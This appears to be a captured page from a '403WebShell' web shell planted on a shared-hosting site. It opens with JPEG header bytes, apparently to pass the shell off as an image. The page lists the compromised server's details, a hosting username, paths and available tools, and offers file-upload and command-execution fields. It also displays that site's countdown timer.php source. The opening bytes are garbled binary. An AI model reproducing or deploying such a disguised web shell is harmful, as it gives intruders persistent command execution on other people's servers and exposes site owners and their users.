����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 3.17.181.181
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/malawisounds.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/malawisounds.com/timer.php
<!DOCTYPE html>
<html lang="en">
<head>
<link rel="icon" type="x-icon" href="Icons/malawisounds.ico">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">

<link rel="stylesheet" type="text/css" href="load.css">
<link rel="stylesheet" type="text/css" href="w3.css">
<link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.css">
<link rel="icon" type="x-icon" href="Icons/malawisounds.ico">
<link rel="stylesheet" type="text/css" href="impact/stylesheet.css" />
<script type="text/javascript" src="js/ajax.js"></script>
</head>
<body>
	<?php
	if(isset($_GET['time']))
	{
		$date=$_GET['time'];
		$current=time();
		$added=$date-$current;
		$hours=floor($added/3600); //converting seconds to hours then finding LCM
		$minutes=floor(((($added/3600)-floor($added/3600))/1)*60); //extracting decimal,dividing by 1, multiplying by 60 finally taking LCM
		$seconds=floor(((($added/60)-floor($added/60))/1)*60); //extracting decimal,dividing by 1 and multiplying by 60
	}
	if($hours<0)
	{
		die("<h3><center>LINK HAS EXPIRED</center></h3>");
	}
	?>
	<div class="expires">
		<table>
			<tr>
				<td>hr</td>
				<td>min</td>
				<td>sec</td>
			</tr>
			<tr>
				<td><?php echo $hours;?></td>
				<td><?php echo $minutes;?></td>
				<td><?php echo $seconds;?></td>
			</tr>
		</table>
	</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit